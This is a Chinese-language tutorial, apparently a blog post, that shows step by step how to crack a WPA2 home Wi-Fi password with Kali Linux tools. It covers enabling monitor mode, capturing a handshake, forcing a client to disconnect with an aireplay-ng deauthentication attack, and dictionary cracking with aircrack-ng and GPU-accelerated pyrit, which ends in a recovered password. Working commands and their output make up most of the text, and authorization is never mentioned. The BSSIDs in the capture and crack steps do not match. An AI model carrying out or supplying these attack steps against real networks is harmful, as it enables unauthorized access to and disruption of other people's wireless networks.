kali无线破解实战示例

首先需要有一台运行kali linux的机器，无论是虚拟机或物理机，一块支持监听模式的无线网卡

    root@kali:~# iwconfig 
    wlan1     IEEE 802.11bg  ESSID:off/any  
              Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
              Retry short limit:7   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              
    eth0      no wireless extensions.
    lo        no wireless extensions.

查看无线网卡设备名

    root@kali:~# airmon-ng start wlan1
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e 
    PID     Name
    2772    dhclient
    4415    wpa_supplicant
    Interface       Chipset         Driver
    wlan1           Realtek RTL8187L        rtl8187 - [phy0]
                                    (monitor mode enabled on mon0)

进入监听模式

airodump-ng mon0 会列出搜索到的所有无线网络
从中找到你要测试破解的，copy下来BSSID

    root@kali:~/test# airodump-ng -w nenew  -c 11 --bssid E4:D3:32:41:56:12   mon0
     CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12                                         
                                                                                                                                                                                                       
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                                       
     E4:D3:32:41:56:12  -44  53      171        7    0  11  54e. WPA2 CCMP   PSK  TP-LINK_5612                                                                                                         
                                                                                                                                                                                                       
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                         
                                                                                                                                                                                                       
     E4:D3:32:41:56:12  00:00:00:00:00:00    0    0 - 1      0    18135                                                                                                                                 
     E4:D3:32:41:56:12  64:B4:73:40:60:5C  -21    1e- 6e     0        7

当看到WPA handshake:说明抓到了握手包，就可以来破解了

如果一直抓不到，可以用如下命令来攻击，强迫重新握手

    aireplay-ng -0 10 -a E4:D3:32:41:56:12  -c 64:B4:73:40:60:5C  mon0  --ignore-negative-one

抓到握手包后，就可以用字典来跑密码了。

    root@kali:~/test# aircrack-ng -w ./password.txt  nenew-21.cap 
    Opening nenew-21.cap
    Read 18654 packets.
       #  BSSID              ESSID                     Encryption
       1  D0:C7:C0:6E:53:53  TP-LINK_5353              WPA (1 handshake)
    Choosing first network as target.
    Opening nenew-21.cap
    Reading packets, please wait...

跑的速度如何取决于你机器的性能，更取决于你的字典
如果用物理机，有比较好的显卡，还可以用显卡来加速破解，效率比cpu高的多

kali linux下装显卡驱动，sdk等，参考如下链接
http://xiao106347.blog.163.com/blog/static/2159920782013113013549364
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
http://blog.sina.com.cn/s/blog_56a70c040101exje.html

我这里用显卡，很快就跑出了密码

    root@kali:~# pyrit -r nenew-21.cap  -i password.txt -b D0:C7:C0:6E:53:53 attack_passthrough
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    Parsing file 'nenew-21.cap' (1/1)...
    Parsed 14 packets (14 802.11-packets), got 1 AP(s)
    Tried 4420221 PMKs so far; 86496 PMKs per second.
    The password is 'qq123789'.